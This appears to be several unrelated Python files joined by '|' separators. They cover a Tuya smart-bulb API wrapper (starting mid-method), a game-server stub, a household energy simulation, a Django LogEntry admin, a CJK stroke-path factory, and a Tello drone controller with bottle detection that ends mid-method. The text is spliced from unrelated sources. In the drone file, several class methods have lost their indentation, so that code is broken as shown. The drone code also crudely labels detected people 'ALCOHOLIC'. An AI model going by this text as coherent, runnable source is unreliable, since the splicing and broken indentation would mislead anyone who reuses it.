        """
        Colour mode settings.

        Uses code: colour_data

        :param rgb: rgb coordinates
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response dict
        """
        code_name = "colour_data"
        device_id = self._check_device_id(device_id)

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        # Scale HSV: h to 0-360, s/v to 0-255 (the v2 code uses 0-1000).
        h, s, v = colorsys.rgb_to_hsv(rgb[0] / 255, rgb[1] / 255, rgb[2] / 255)
        body = self._make_body(code_name, {"h": h * 360, "s": s * 255, "v": v * 255})
        response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
        return response

    def set_colour_v2(
        self, rgb: tuple, check: bool = None, device_id: str = None
    ) -> dict:
        """
        Colour mode settings.

        Uses code: colour_data_v2

        :param rgb: rgb coordinates
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response dict
        """
        code_name = "colour_data_v2"
        device_id = self._check_device_id(device_id)

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        # v2 scales s and v to 0-1000 instead of 0-255.
        h, s, v = colorsys.rgb_to_hsv(rgb[0] / 255, rgb[1] / 255, rgb[2] / 255)
        body = self._make_body(
            code_name=code_name, value={"h": h * 360, "s": s * 1000, "v": v * 1000}
        )
        response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
        return response

    def set_toggle(
        self, state: bool = None, check: bool = True, device_id: str = None
    ) -> dict:
        """
        Turn ON or OFF the bulb.

        Uses code: switch_led

        :param state: explicit target state; None inverts the current state
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response dict
        """
        code_name = "switch_led"
        device_id = self._check_device_id(device_id)

        if self._should_check(check):
            self._function_exists(code_name=code_name, device_id=device_id)

        if state is None:
            # No explicit state: invert whatever the bulb reports now.
            state = not self.current_value(code_name=code_name, device_id=device_id)

        body = self._make_body(code_name=code_name, value=state)
        response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
        return response

    def set_toggle_timer(
        self, value: int, check: bool = None, device_id: str = None
    ) -> dict:
        """
        On or Off this device by timer.

        Uses code: countdown_1

        :param value: minutes, 0-1440 (24 hours). Pass 0 to cancel the timer.
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise ValueError: if the value is out of range
        :return: response dict
        """
        code_name = "countdown_1"
        device_id = self._check_device_id(device_id)

        # ROBUSTNESS: negative values used to be sent to the API unchecked.
        if value < 0 or value > 1440:
            raise ValueError(f"{code_name} -> The value must be between 0-1440")

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        body = self._make_body(code_name=code_name, value=value * 60)  # API takes seconds
        response = self._post(postfix=f"/devices/{device_id}/commands", body=body)
        return response

    def turn_on(self, check: bool = True, device_id: str = None) -> dict:
        """
        Turn ON the bulb.

        Uses code: switch_led

        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response status dict
        """
        device_id = self._check_device_id(device_id)
        return self.set_toggle(state=True, check=check, device_id=device_id)

    def turn_off(self, check: bool = True, device_id: str = None) -> dict:
        """
        Turn OFF the bulb.

        Uses code: switch_led

        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response status dict
        """
        device_id = self._check_device_id(device_id)
        return self.set_toggle(state=False, check=check, device_id=device_id)

    def set_colour_temp(
        self, value: int, check: bool = None, device_id: str = None
    ) -> dict:
        """
        Colour temperature.

        Uses code: temp_value

        :param value: 25-255, warm (25) to cold (255)
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise ValueError: if the value is out of range
        :return: response dict
        """
        code_name = "temp_value"

        # BUG FIX: error message typo "rage" -> "range".
        if value < 25 or value > 255:
            raise ValueError(f"{value} -> The value not in range 25-255")

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        return self._template(value=value, code_name=code_name, device_id=device_id)

    def set_colour_temp_v2(
        self, value: int, check: bool = None, device_id: str = None
    ) -> dict:
        """
        Colour temperature.

        Uses code: temp_value_v2

        :param value: 0-100, warm (0) to cold (100)
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise ValueError: if the value is out of range
        :return: response dict
        """
        code_name = "temp_value_v2"

        if value < 0 or value > 100:
            raise ValueError(f"{value} -> The value not in range 0-100")

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        # v2 works on a 0-1000 scale.
        return self._template(value=value * 10, code_name=code_name, device_id=device_id)

    def set_bright(self, value: int, check: bool = None, device_id: str = None) -> dict:
        """
        Brightness level.

        Uses code: bright_value

        :param value: 25-255
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise ValueError: if the value is out of range
        :return: response dict
        """
        code_name = "bright_value"

        if value < 25 or value > 255:
            raise ValueError(f"{value} -> The value not in range 25-255")

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        return self._template(value=value, code_name=code_name, device_id=device_id)

    def set_bright_v2(
        self, value: int, check: bool = None, device_id: str = None
    ) -> dict:
        """
        Brightness level. v2 only.

        Uses code: bright_value_v2

        :param value: 1-100
        :param check: check if your device supports this mode.
            Default: True == Always check. Set to False if you are sure the device supports the mode.
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise ValueError: if the value is out of range
        :return: response dict
        """
        code_name = "bright_value_v2"

        if value < 1 or value > 100:
            raise ValueError(f"{value} -> The value not in range 1-100")

        if self._should_check(check):  # BUG FIX: flag was inverted
            self._function_exists(code_name=code_name, device_id=device_id)

        # v2 works on a 0-1000 scale.
        return self._template(value=value * 10, code_name=code_name, device_id=device_id)

    def state(self, device_id: str = None) -> dict:
        """
        Get all current state of the bulb.

        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response status dict
        """
        device_id = self._check_device_id(device_id)
        return self._get(postfix=f"/devices/{device_id}/status")["result"]

    def functions(self, device_id: str = None) -> dict:
        """
        Get all available functions for this bulb.

        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :return: response functions dict
        """
        device_id = self._check_device_id(device_id)
        return self._get(f"/devices/{device_id}/functions")["result"]["functions"]

    def current_value(self, code_name: str, device_id: str = None):
        """
        Get value of the selected function.

        :param code_name: name to find
        :param device_id: select device_id for this action only. tuya_bulb_control.Bulb(device_id) will be ignored
        :raise FunctionNotSupported: if the function isn't reported in the state
        :return: value
        """
        try:
            value = [
                item["value"]
                for item in self.state(device_id)
                if item["code"] == code_name
            ][0]
        except (IndexError, KeyError):
            raise FunctionNotSupported(target=code_name)
        return value
|
from direct.directnotify import DirectNotifyGlobal
from direct.distributed.DistributedObjectAI import DistributedObjectAI
class DistributedPhaseEventMgrAI(DistributedObjectAI):
    """AI-side distributed manager for phase events.

    Currently an empty stub: it only creates its notify channel; all
    behaviour is inherited from DistributedObjectAI.
    """
    notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPhaseEventMgrAI')
|
from ApplianceOwner import ApplianceOwner
from ApplianceOwner import HouseHold
import numpy
class Community():
    """A collection of HouseHold objects whose energy use is simulated hour by hour."""

    def __init__(self, number_of_households, mean_residents, sd_residents):
        self.number_of_households: int = number_of_households
        self.mean_residents: float = mean_residents
        self.sd_residents: float = sd_residents
        # Fixed annotation: this is a list of HouseHold objects, not an ApplianceOwner.
        self.household_list: list = []
        self.logging: bool = False
        self.solar_panel_status = False

    # Not sure if this is technically an accessor method or more like a
    # toString() method from java, had to make a call.
    def getSummary(self) -> str:
        """Return a human-readable, multi-line report of the whole community."""
        summary = "--- Summary of community ---\n"
        summary += "Households: " + str(len(self.household_list)) + "\n"
        summary += "*** Summary of Households *** \n"
        for index, household in enumerate(self.household_list):
            summary += household.getSummary(index) + "\n"
        summary += "### End of community summary ###\n"
        return summary

    def setLogging(self, logging: bool):
        # Checking a boolean is much cheaper than printing inside nested loops,
        # and lets logging be toggled without commenting out statements.
        self.logging = logging

    def setSolarPanelStatus(self, status: bool):
        self.solar_panel_status = status

    def createHouseHolds(self, appliances_per_household: int = 2):
        """Populate household_list with randomly sized households.

        :param appliances_per_household: passed to HouseHold.createAppliances;
            defaults to the previously hard-coded value of 2.
        """
        for _ in range(self.number_of_households):
            # Resident count drawn from a normal distribution:
            # https://docs.scipy.org/doc/numpy-1.15.1/reference/generated/numpy.random.randn.html
            num_residents = int(numpy.random.randn() * self.sd_residents + self.mean_residents)
            # A household cannot have fewer than 1 resident. This clips the
            # normal distribution, which is acceptable for this simulation.
            if num_residents < 1:
                num_residents = 1
            house_hold = HouseHold(num_residents)
            house_hold.setLogging(self.logging)
            house_hold.setSolarPanelStatus(self.solar_panel_status)
            house_hold.createResidents()
            house_hold.createAppliances(appliances_per_household)
            self.household_list.append(house_hold)
            if self.logging:
                print("\t[Notice]: Created a household with " + str(num_residents) + " resident(s)")
        if self.logging:
            print("[Notice]: Created community with " + str(self.number_of_households) + " households")

    def tickEnergy(self, hour_of_day: int) -> float:
        """Advance every household by one hour and return total energy used (Joules)."""
        print("----------For hour: " + str(hour_of_day) + " ------------------")
        sum_of_energy = 0.0
        for household in self.household_list:
            sum_of_energy += household.tickEnergy(hour_of_day)
        # 3,600,000 J == 1 kWh.
        print("Community: " + " consumed: " + str(sum_of_energy/3600000) + " kWh at: " + str(hour_of_day))
        print("_____________________________")
        print()
        return sum_of_energy
#community = Community(2,3.2,1.5)
#community.setLogging(False)
#community.createHouseHolds()
#print(community.getSummary())
#print(str(community.tickEnergy(5)/1000/1000)) |
from __future__ import unicode_literals
from django.contrib import admin
from django.contrib.admin.models import LogEntry, ADDITION, CHANGE, DELETION
from django.utils.html import escape
from django.core.urlresolvers import reverse, NoReverseMatch
from django.contrib.auth.models import User
# Human-readable labels for django.contrib.admin.models.LogEntry.action_flag.
action_names = {
    ADDITION: 'Addition',
    CHANGE: 'Change',
    DELETION: 'Deletion',
}
class FilterBase(admin.SimpleListFilter):
    """Base list filter: narrows the queryset by this filter's parameter when a value is selected."""

    def queryset(self, request, queryset):
        if self.value():
            # Replaces the convoluted dict(((k, v),)) construction with a
            # plain dict literal — same single-key kwargs expansion.
            return queryset.filter(**{self.parameter_name: self.value()})
        # Implicit None: Django leaves the queryset unchanged.
class ActionFilter(FilterBase):
    # Sidebar filter on LogEntry.action_flag (Addition/Change/Deletion).
    title = 'action'
    parameter_name = 'action_flag'

    def lookups(self, request, model_admin):
        # (flag, label) pairs rendered in the admin sidebar.
        return action_names.items()
class UserFilter(FilterBase):
    """Use this filter to only show current users, who appear in the log."""
    title = 'user'
    parameter_name = 'user_id'

    def lookups(self, request, model_admin):
        # Only offer users that actually have at least one log entry.
        logged_user_ids = LogEntry.objects.values_list('user_id').distinct()
        users = User.objects.filter(pk__in=logged_user_ids)
        return tuple((user.id, user.username) for user in users)
class AdminFilter(UserFilter):
    """Use this filter to only show current Superusers."""
    title = 'admin'

    def lookups(self, request, model_admin):
        superusers = User.objects.filter(is_superuser=True)
        return tuple((user.id, user.username) for user in superusers)
class StaffFilter(UserFilter):
    """Use this filter to only show current Staff members."""
    title = 'staff'

    def lookups(self, request, model_admin):
        staff_members = User.objects.filter(is_staff=True)
        return tuple((user.id, user.username) for user in staff_members)
class LogEntryAdmin(admin.ModelAdmin):
    """Read-only admin browser over Django's built-in LogEntry audit records."""
    date_hierarchy = 'action_time'

    # NOTE(review): Model._meta.get_all_field_names() and the queryset()
    # override below are pre-Django-1.8/1.6 APIs, consistent with the
    # django.core.urlresolvers import above — this module targets an old
    # Django release; confirm before upgrading.
    readonly_fields = LogEntry._meta.get_all_field_names()

    list_filter = [
        UserFilter,
        ActionFilter,
        'content_type',
        # 'user',
    ]

    search_fields = [
        'object_repr',
        'change_message'
    ]

    list_display = [
        'action_time',
        'user',
        'content_type',
        'object_link',
        'action_flag',
        'action_description',
        'change_message',
    ]

    def has_add_permission(self, request):
        # Log entries are created by Django itself, never by hand.
        return False

    def has_change_permission(self, request, obj=None):
        # Superusers may view the detail page (GET only); nobody may save.
        return request.user.is_superuser and request.method != 'POST'

    def has_delete_permission(self, request, obj=None):
        return False

    def object_link(self, obj):
        # Render the logged object as a link to its change page; deletions
        # (and unresolvable URLs) fall back to plain escaped text.
        ct = obj.content_type
        repr_ = escape(obj.object_repr)
        try:
            href = reverse('admin:%s_%s_change' % (ct.app_label, ct.model), args=[obj.object_id])
            link = u'<a href="%s">%s</a>' % (href, repr_)
        except NoReverseMatch:
            link = repr_
        return link if obj.action_flag != DELETION else repr_
    object_link.allow_tags = True
    object_link.admin_order_field = 'object_repr'
    object_link.short_description = u'object'

    def queryset(self, request):
        # Prefetch content types to avoid one query per changelist row.
        return super(LogEntryAdmin, self).queryset(request) \
            .prefetch_related('content_type')

    def action_description(self, obj):
        return action_names[obj.action_flag]
    action_description.short_description = 'Action'


admin.site.register(LogEntry, LogEntryAdmin)
from .stroke import Stroke, StrokePosition
from .component import Component, ComponentInfo
from .stroke_path import *
from .shape import Pane
class StrokeSpec:
    """Describes how a stroke is built: by named type + parameters, by explicit
    segments, or by absolute spline control points (converted to relative)."""

    def __init__(self, typeName, parameters = None, segments = None,
            splinePointsList = None):
        self.typeName = typeName
        self.parameters = parameters
        self.segments = segments
        if splinePointsList:
            # Convert absolute control points into per-curve points relative
            # to the end point of the previous curve (strokes start at (0, 0)).
            lastEndPoint = (0, 0)
            relativeControlPointsList = []
            for points in splinePointsList:
                newPoints = [(point[0] - lastEndPoint[0], point[1] - lastEndPoint[1]) for point in points]
                relativeControlPointsList.append(newPoints)
                lastEndPoint = points[-1]
            self.relativeControlPointsList = relativeControlPointsList
            self.absoluteControlPointsList = splinePointsList
        else:
            self.relativeControlPointsList = None
            self.absoluteControlPointsList = None

    def isBySegments(self):
        # `is not None` instead of `!= None`: identity check is the Python idiom.
        return self.segments is not None

    def isByControlPoints(self):
        return self.relativeControlPointsList is not None
class StrokeFactory:
    """Builds StrokePath and Stroke objects from StrokeSpec descriptions.

    Holds one path generator per named stroke type (CJK stroke names).
    Some names deliberately alias the same generator (e.g. 扁斜鉤 uses the
    豎彎鉤 generator; 撇提 and 撇折 use the 撇橫 generator).
    """

    def __init__(self):
        from .segment import SegmentFactory
        segmentFactory = SegmentFactory()
        self.segmentFactory = segmentFactory

        # Map: stroke type name -> path generator. Keys are runtime lookup
        # strings used by StrokeSpec.typeName; do not rename them.
        self.strokePathMap = {
            "點": StrokePathGenerator_點(segmentFactory),
            # "長頓點": StrokePathGenerator_點(segmentFactory),
            "圈": StrokePathGenerator_圈(segmentFactory),
            "橫": StrokePathGenerator_橫(segmentFactory),
            "橫鉤": StrokePathGenerator_橫鉤(segmentFactory),
            "橫折": StrokePathGenerator_橫折(segmentFactory),
            "橫折折": StrokePathGenerator_橫折折(segmentFactory),
            "橫折提": StrokePathGenerator_橫折提(segmentFactory),
            "橫折折撇": StrokePathGenerator_橫折折撇(segmentFactory),
            "橫折鉤": StrokePathGenerator_橫折鉤(segmentFactory),
            "橫折彎": StrokePathGenerator_橫折彎(segmentFactory),
            "橫撇": StrokePathGenerator_橫撇(segmentFactory),
            "橫斜彎鉤": StrokePathGenerator_橫斜彎鉤(segmentFactory),
            "橫折折折鉤": StrokePathGenerator_橫折折折鉤(segmentFactory),
            "橫斜鉤": StrokePathGenerator_橫斜鉤(segmentFactory),
            "橫折折折": StrokePathGenerator_橫折折折(segmentFactory),
            "豎": StrokePathGenerator_豎(segmentFactory),
            "豎折": StrokePathGenerator_豎折(segmentFactory),
            "豎彎左": StrokePathGenerator_豎彎左(segmentFactory),
            "豎提": StrokePathGenerator_豎提(segmentFactory),
            "豎折折": StrokePathGenerator_豎折折(segmentFactory),
            "豎折彎鉤": StrokePathGenerator_豎折彎鉤(segmentFactory),
            "豎彎鉤": StrokePathGenerator_豎彎鉤(segmentFactory),
            "豎彎": StrokePathGenerator_豎彎(segmentFactory),
            "豎鉤": StrokePathGenerator_豎鉤(segmentFactory),
            "扁斜鉤": StrokePathGenerator_豎彎鉤(segmentFactory),
            "斜鉤": StrokePathGenerator_斜鉤(segmentFactory),
            "彎鉤": StrokePathGenerator_彎鉤(segmentFactory),
            "撇鉤": StrokePathGenerator_撇鉤(segmentFactory),
            "撇": StrokePathGenerator_撇(segmentFactory),
            "撇點": StrokePathGenerator_撇點(segmentFactory),
            "撇橫": StrokePathGenerator_撇橫(segmentFactory),
            "撇提": StrokePathGenerator_撇橫(segmentFactory),
            "撇折": StrokePathGenerator_撇橫(segmentFactory),
            "撇橫撇": StrokePathGenerator_撇橫撇(segmentFactory),
            "豎撇": StrokePathGenerator_豎撇(segmentFactory),
            "提": StrokePathGenerator_提(segmentFactory),
            "捺": StrokePathGenerator_捺(segmentFactory),
            "臥捺": StrokePathGenerator_臥捺(segmentFactory),
            "提捺": StrokePathGenerator_提捺(segmentFactory),
            "橫捺": StrokePathGenerator_橫捺(segmentFactory),
            "橫撇彎鉤": StrokePathGenerator_橫撇彎鉤(segmentFactory),
            "豎彎折": StrokePathGenerator_豎彎折(segmentFactory),
        }

    # StrokePath
    def generateStrokePathBySpec(self, spec: StrokeSpec):
        """Build a StrokePath from a spec, preferring segments, then control
        points, then the named-type generator."""
        if spec.isBySegments():
            segments = spec.segments
            strokePath = StrokePath(segments)
        elif spec.isByControlPoints():
            segmentFactory = self.segmentFactory
            # Start at (0, 0)
            # Format:
            # [
            #   [(x, y)],
            #   [(x, y), (x,y)],
            # ]
            controlPointsList = spec.relativeControlPointsList
            segments = []
            controlPoint = None
            for points in controlPointsList:
                segmentCount = len(points)
                if segmentCount == 2:
                    # Quadratic Bézier curve
                    segment = segmentFactory.generateSegment_QCurve(points[0], points[1])
                elif segmentCount == 1:
                    # Linear (first-order Bézier)
                    segment = segmentFactory.generateSegment_Beeline(points[0])
                else:
                    # Only 1 or 2 control points per curve are supported.
                    assert False
                segments.append(segment)
            strokePath = StrokePath(segments)
        else:
            strokeTypeName = spec.typeName
            parameters = spec.parameters

            strokePathGenerator = self.strokePathMap.get(strokeTypeName, None)
            # NOTE(review): `!= None` should idiomatically be `is not None`,
            # and an unknown type name might deserve a real exception.
            assert strokePathGenerator!=None

            strokePath = strokePathGenerator.generate(parameters)
        return strokePath

    # Stroke
    def _generateStroke(self, name, strokePath, strokeBoundPane):
        # Position the path's relative origin inside the bounding pane.
        infoPane = strokePath.pane
        startPoint = infoPane.transformRelativePointByTargetPane((0, 0), strokeBoundPane)
        strokePosition = StrokePosition(startPoint, strokeBoundPane)
        return Stroke(name, strokePath, strokePosition)

    def generateStrokeBySpec(self, spec: StrokeSpec, startPoint = None, strokeBoundPane = None):
        """Build a positioned Stroke; needs either startPoint or strokeBoundPane
        for non-segment specs (the other is derived)."""
        strokeTypeName = spec.typeName
        strokePath = self.generateStrokePathBySpec(spec)
        if spec.isBySegments():
            boundary = strokePath.computeBoundaryWithStartPoint(startPoint)
            pane = Pane(*boundary)
            return self._generateStroke(strokeTypeName, strokePath, pane)
        else:
            assert startPoint != None or strokeBoundPane != None
            if startPoint:
                boundary = strokePath.computeBoundaryWithStartPoint(startPoint)
                strokeBoundPane = Pane(*boundary)
            else:
                infoPane = strokePath.pane
                startPoint = infoPane.transformRelativePointByTargetPane((0, 0), strokeBoundPane)
            return self._generateStroke(strokeTypeName, strokePath, strokeBoundPane)
class ComponentFactory:
    """Builds Component objects from strokes, or re-fits existing components into new panes."""

    def __init__(self):
        pass

    def _generateComponent(self, strokes, pane = None):
        # Default the pane to the bounding pane computed from the strokes.
        info = ComponentInfo(strokes)
        return Component(info, pane if pane else info.getInfoPane())

    def generateComponentByStrokes(self, strokes):
        return self._generateComponent(strokes)

    def generateComponentByComponentPane(self, component, pane):
        # Transform every stroke from the component's own pane into `pane`.
        sourcePane = component.getStatePane()
        transformed = [stroke.transform(sourcePane, pane) for stroke in component.getStrokeList()]
        return self._generateComponent(transformed)

    def generateComponentByComponentPanePairs(self, componentPanePairs):
        from .shape import mergePanes
        strokes = []
        for component, pane in componentPanePairs:
            fitted = self.generateComponentByComponentPane(component, pane)
            strokes.extend(fitted.getStrokeList())
        mergedPane = mergePanes([stroke.getStatePane() for stroke in strokes])
        return self._generateComponent(strokes, mergedPane)
|
import socket
import threading
import time
import cv2
from easytello.stats import Stats
from functools import wraps
from playsound import playsound
import detect
import navigate
class Tello:
    def __init__(self, tello_ip: str='192.168.10.1', debug: bool=True):
        """Open the UDP command channel, start the response and battery
        keep-alive threads, and put the drone into SDK command mode."""
        # Opening local UDP port on 8889 for Tello communication
        self.local_ip = ''
        self.local_port = 8889
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.socket.bind((self.local_ip, self.local_port))
        # Setting Tello ip and port info
        self.tello_ip = tello_ip
        self.tello_port = 8889
        self.tello_address = (self.tello_ip, self.tello_port)
        self.log = []
        # Intializing response thread
        self.receive_thread = threading.Thread(target=self._receive_thread)
        self.receive_thread.daemon = True
        self.receive_thread.start()
        # easyTello runtime options
        self.stream_state = False
        self.MAX_TIME_OUT = 15.0
        self.debug = debug
        # Setting Tello to command mode
        self.command()
        # When set to True, the photo will be saved and model will be notified
        self.send_photo = False
        # Storing the whole history of positions
        self.up_down = [0]
        self.forward_backward = [0]
        self.right_left = [0]
        self.clockwise_angle = [0]
        # Storing the history of commands with their values
        self.command_history = []
        # Storing the things that can be seen from certain coordinates
        self.objects_to_be_seen = {}
        # Sending infinite ping to the battery, to keep the connection alive.
        # NOTE(review): this rebinds self.receive_thread, dropping the
        # reference to the response thread started above (both daemon threads
        # keep running regardless) — consider a separate attribute name.
        self.receive_thread = threading.Thread(target=self.battery_ping)
        self.receive_thread.daemon = True
        self.receive_thread.start()
        self.found = False
def battery_ping(self, debug=False):
# _f = str(inspect.stack()[0][3])
while True:
time.sleep(5)
# if debug:
# print(f"{_f}: sent ping")
# if command(b'battery?', debug=debug) is not None:
# break
print("contacting battery")
capacity = self.get_battery()
print(str(capacity) + "%")
    # A make_photo decorator was attempted (see make_photo below), but the
    # photo request is done via the make_photo flag at the end instead.
    # @make_photo
    def send_command(self, command: str, query: bool=False, make_photo: bool=False):
        """Send one SDK command string and block until a response or MAX_TIME_OUT.

        :param command: raw Tello SDK command string (e.g. 'forward 40')
        :param query: True for read commands ('battery?'); suppresses the
            response print so the caller can fetch it from the log
        :param make_photo: when True, request a camera frame ~1 s after the command
        """
        # New log entry created for the outbound command
        self.log.append(Stats(command, len(self.log)))
        # Sending command to Tello
        self.socket.sendto(command.encode('utf-8'), self.tello_address)
        # Displaying conformation message (if 'debug' os True)
        if self.debug is True:
            print('Sending command: {}'.format(command))
        # Checking whether the command has timed out or not (based on value in 'MAX_TIME_OUT')
        start = time.time()
        while not self.log[-1].got_response():  # Runs while no repsonse has been received in log
            now = time.time()
            difference = now - start
            if difference > self.MAX_TIME_OUT:
                print('Connection timed out!')
                break
        # Prints out Tello response (if 'debug' is True)
        if self.debug is True and query is False:
            print('Response: {}'.format(self.log[-1].get_response()))
        # At the end of each command, wait a little bit and take a photo
        # TODO: decide, whether time.sleep() is even necessary
        if make_photo:
            time.sleep(1)
            self.signal_to_make_photo()
    def _receive_thread(self):
        """Daemon loop: receive UDP responses and attach them to the newest log entry."""
        while True:
            # Checking for Tello response, throws socket error
            try:
                self.response, ip = self.socket.recvfrom(1024)
                self.log[-1].add_response(self.response)
            except socket.error as exc:
                print('Socket error: {}'.format(exc))
    def _video_thread(self):
        """Daemon loop: read frames from the UDP video stream, display them,
        and save/analyze a frame whenever send_photo has been set."""
        # Creating stream capture object
        cap = cv2.VideoCapture('udp://'+self.tello_ip+':11111')
        # Runs while 'stream_state' is True
        while self.stream_state:
            try:
                ret, frame = cap.read()
                cv2.imshow('DJI Tello', frame)

                # Video Stream is closed if escape key is pressed
                k = cv2.waitKey(1) & 0xFF
                if k == 27:
                    break

                # Used for testing purposes when in person mode
                if k == 13:  # key "enter"
                    print("Enter pressed")
                    self.signal_to_make_photo()

                # Ready to respond for the need of photo
                if self.send_photo:
                    # Reset the flag first so only one frame is captured.
                    self.send_photo = False
                    print("Automatic photo")
                    file_name = self.save_photo(frame)
                    is_there_a_bottle = self.contact_model(file_name)
            except cv2.error as err:
                print("CV ERROR ENCOUNTERED")
                print(err)
        cap.release()
        cv2.destroyAllWindows()
# Decorators are not possible to make in classes (or nor very useful)
# Theoretically I can call self.make_photo(original_function), instead of decorating it
def make_photo(self, orig_func):
@wraps(orig_func)
def wrapper(*args, **kwargs):
result = orig_func(*args, **kwargs)
time.sleep(1)
self.signal_to_make_photo()
return result
return wrapper
    def signal_to_make_photo(self):
        """
        Sends signal to save a photo.

        Sets the send_photo flag; the video thread picks it up and saves the
        next captured frame.
        """
        print_with_time("signal_to_make_photo")
        self.send_photo = True
def save_photo(self, frame):
"""
Saves a photo on the harddrive
"""
print_with_time("save_photo")
timestamp = time.time()
file_name = "photo_{}.png".format(timestamp)
cv2.imwrite(file_name, frame)
return file_name
def contact_model(self, file_name):
"""
Calls the model to analyze the photo. Stores the objects it finds in a
local dictionary.
Returns a boolean whether the bottle was located
"""
print_with_time("contact_model")
response = detect.detect_image_from_path(file_name)
current_positon = self.get_current_position_string()
self.objects_to_be_seen[current_positon] = response
is_there_a_bottle = False
for obj in response:
if obj["name"] == "bottle":
is_there_a_bottle = True
print("BOTTLE THERE!")
playsound('Hlas 001.mp3')
break
print("is_there_a_bottle", is_there_a_bottle)
if is_there_a_bottle:
for obj in response:
if obj["name"] == "person":
is_there_a_bottle = True
print("ALCOHOLIC THERE!")
playsound('Hlas 003.mp3')
break
# Drawing a rectangle around the object
img = cv2.imread(file_name)
x_pixels_dron = 960
y_pixels_dron = 720
x_pixels_model = 416
y_pixels_model = 416
x_ratio = x_pixels_dron / x_pixels_model
y_ratio = y_pixels_dron / y_pixels_model
print("rectangle")
for obj in response:
print(obj)
x1 = int(obj["x1"] * x_ratio)
x2 = int(obj["x2"] * x_ratio)
y1 = int(obj["y1"] * y_ratio)
y2 = int(obj["y2"] * y_ratio)
area = abs(x1 - x2) * abs(y1 - y2)
print(area)
start = (x1, y1)
end = (x2, y2)
print("start", start)
print("end", end)
# Green colour by default
colour = (0, 255, 0)
# Red colour, if the object is
# WARNING: for some reason it is not RGB, but BGR
if obj["name"] == "bottle":
colour = (0, 0, 255)
# Let laptop be BLUE
elif obj["name"] == "laptop":
colour = (255, 0, 0)
cv2.rectangle(img, start, end, colour, 3)
cv2.imwrite(file_name[:-4] + "_rectangled.png", img)
print(response)
# Speaking with the agent, who tells us what to do next to approach a bottle
found_mode = False
is_lost = False
for i, d in enumerate(response):
# Followign a bottle!!!!!
if d["name"] == "bottle":
found_mode = True
angle, height, forward = navigate.analyze_scene(d)
no_change = angle == 0 and height == 0 and forward == 0
print("{} {}: angle {} height {} forward {}".format(d['name'], i, angle, height, forward))
command = ""
if angle > 0:
command = "cw {}".format(20)
elif angle < 0:
command = "ccw {}".format(20)
elif forward > 0:
command = "forward {}".format(40)
self.found = True
break
else:
command = "cw 20"
if self.found == True:
navigate.take_three_flips()
with open("commands.txt", "a") as command_file:
command_file.write(command + "\n")
if found_mode and (is_lost or no_change):
navigate.take_three_flips()
found_mode = False
return is_there_a_bottle
    def wait(self, delay: float):
        """Pause the command stream for `delay` seconds, logged as a 'wait' entry."""
        # Displaying wait message (if 'debug' is True)
        if self.debug is True:
            print('Waiting {} seconds...'.format(delay))
        # Log entry for delay added
        self.log.append(Stats('wait', len(self.log)))
        # Delay is activated
        time.sleep(delay)

    def get_log(self):
        """Return the list of Stats entries, one per command sent."""
        return self.log
    # Control commands — thin wrappers over the Tello SDK text protocol.
    def command(self):
        # Enter SDK command mode; must be sent before any other command.
        self.send_command('command')

    def takeoff(self):
        self.send_command('takeoff', make_photo=True)

    def land(self):
        self.send_command('land')

    def streamon(self):
        # Enable the UDP video stream and spawn the frame-reading thread.
        self.send_command('streamon')
        self.stream_state = True
        self.video_thread = threading.Thread(target=self._video_thread)
        self.video_thread.daemon = True
        self.video_thread.start()

    def streamoff(self):
        self.stream_state = False
        self.send_command('streamoff')

    def emergency(self):
        # Stop all motors immediately.
        self.send_command('emergency')
    # Movement commands — distances in cm, angles in degrees. Each records
    # the new pose in the history lists and requests a photo after the move.
    def up(self, dist: int):
        self.store_new_position("up_down", dist)
        self.send_command('up {}'.format(dist), make_photo=True)

    def down(self, dist: int):
        self.store_new_position("up_down", -dist)
        self.send_command('down {}'.format(dist), make_photo=True)

    def left(self, dist: int):
        self.store_new_position("right_left", -dist)
        self.send_command('left {}'.format(dist), make_photo=True)

    def right(self, dist: int):
        self.store_new_position("right_left", dist)
        self.send_command('right {}'.format(dist), make_photo=True)

    def forward(self, dist: int):
